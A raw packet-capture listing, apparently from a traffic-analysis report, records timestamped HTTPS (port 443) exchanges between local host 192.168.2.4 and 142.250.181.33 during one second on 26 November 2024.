                                                                          Nov 26, 2024 08:24:07.403003931 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.404269934 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.404305935 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.404330969 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.404337883 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.404376030 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.420348883 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.420864105 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.420895100 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.420912981 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.420919895 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.420972109 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.421925068 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.430934906 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.430993080 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.430999994 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.431544065 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.431596994 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.431601048 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.431605101 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.431639910 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.432565928 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.450594902 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.450639963 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.450647116 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.451018095 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.451060057 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.451066017 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.455805063 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.455840111 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.455861092 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.455866098 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.455904961 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.463006020 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.463619947 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.463675976 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.463685036 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.464638948 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.464787960 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.465373039 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.465379000 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.465415001 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.473777056 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.474234104 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.474294901 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.474303007 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.475281954 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.475326061 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.475332022 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.487118959 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.487144947 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.487179995 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.487188101 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.487236023 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.487570047 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.488476992 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.488524914 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.488537073 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.497103930 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.497136116 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.497145891 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.497157097 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.497195005 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.497566938 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.498363972 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.498402119 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.498406887 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.510548115 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.510603905 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.510611057 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.510898113 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.510941982 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.510946035 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.512115002 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.512152910 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.512156963 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.520714045 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.520764112 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.520768881 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.521059990 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.521105051 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.521110058 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.521976948 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.522027969 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.522033930 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.530199051 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.530241013 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.530246973 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.530811071 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.530862093 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.530865908 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.532723904 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.532768011 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.532774925 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.567051888 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.567229986 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.567240953 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.567398071 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.567446947 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.567451954 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.568496943 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.568555117 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.568558931 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.570389032 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.570425987 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.570450068 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.570456982 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.570497990 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.571234941 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.572248936 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.572313070 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.572318077 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.573194981 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.573262930 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.573266983 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.574352026 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.574412107 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.574418068 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.575282097 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.575333118 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.575336933 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.576260090 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.576322079 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.576325893 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.577240944 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.577313900 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.577317953 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.579153061 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.579217911 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.579222918 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.591590881 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.591660023 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.591665983 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.592530966 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.592675924 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.592681885 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.593417883 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.593467951 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.593472958 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.603583097 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.603632927 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.603638887 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.604948997 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.605001926 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.605009079 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.605433941 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.605479956 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.605485916 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.622093916 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.622169971 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.622179031 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.622435093 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.622596025 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.622601986 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.624553919 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.624737024 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.624742985 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.633579016 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.633608103 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.633670092 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.633690119 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.633744955 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.634443045 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.635540962 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.635585070 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.635591030 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.652486086 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.652555943 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.652563095 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.653395891 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.653525114 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.653542995 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.653548956 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.653614044 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.654385090 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.665389061 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.665460110 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.665467978 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.666044950 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.666100979 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.666105032 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.673063040 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.673130035 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.673135042 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.673583984 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.673635960 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.673641920 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.674529076 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.674582005 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.674587965 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.688472033 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.688549995 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.688555956 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.688956976 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.689002037 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.689007998 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.689979076 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.690028906 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.690035105 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.698375940 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.698407888 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.698466063 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.698473930 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.698523998 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.698867083 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.699810982 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.699862957 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.699867964 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.711535931 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.711596966 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.711611986 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.711617947 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.711658001 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.712003946 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.713001966 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.713063955 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.713068962 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.721483946 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.721560001 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.721564054 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.721993923 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.722039938 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.722045898 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.722752094 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.722795963 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.722800970 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.736102104 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.736183882 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.736216068 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.736224890 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.736272097 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.736592054 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.737478971 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.737526894 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.737533092 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.768352032 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.768385887 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.768448114 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.768460035 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.768507004 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.768780947 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.769805908 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.769850016 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.769855022 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.770944118 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.770987988 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.770992994 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.771984100 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.772031069 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.772037029 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.772862911 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.772908926 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.772917032 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.774707079 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.774765968 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.774772882 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.775755882 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.775814056 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.775820017 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.776936054 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.776994944 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.776998997 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.777662039 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.777713060 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.777718067 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.778821945 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.778863907 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.778872013 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.778877974 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.778919935 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.779942989 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.792726994 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.792810917 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.792819023 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.793306112 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.793356895 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.793361902 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.794204950 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.794258118 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.794262886 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.804908991 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.805013895 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.805025101 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.805378914 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.805433035 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.805438042 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.806355953 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.806404114 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.806408882 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.823199034 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.823298931 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.823309898 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.823579073 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.823623896 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.823630095 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.825427055 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.825474977 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.825481892 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.836136103 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.836221933 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.836231947 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.836587906 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.836635113 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.836641073 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.837594986 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.837644100 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.837650061 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.853863001 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.853971958 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.853991032 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.854125977 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.854182959 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.854187965 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.855808973 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.855865955 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.855873108 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.873254061 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.873352051 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.873395920 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.873425961 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.873490095 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.873497963 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.873594046 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.873644114 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.873651028 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.874931097 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.875011921 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.875034094 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.875063896 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.875124931 CET49731443192.168.2.4142.250.181.33
                                                                          Nov 26, 2024 08:24:07.875977039 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.876889944 CET44349731142.250.181.33192.168.2.4
                                                                          Nov 26, 2024 08:24:07.876969099 CET49731443192.168.2.4142.250.181.33
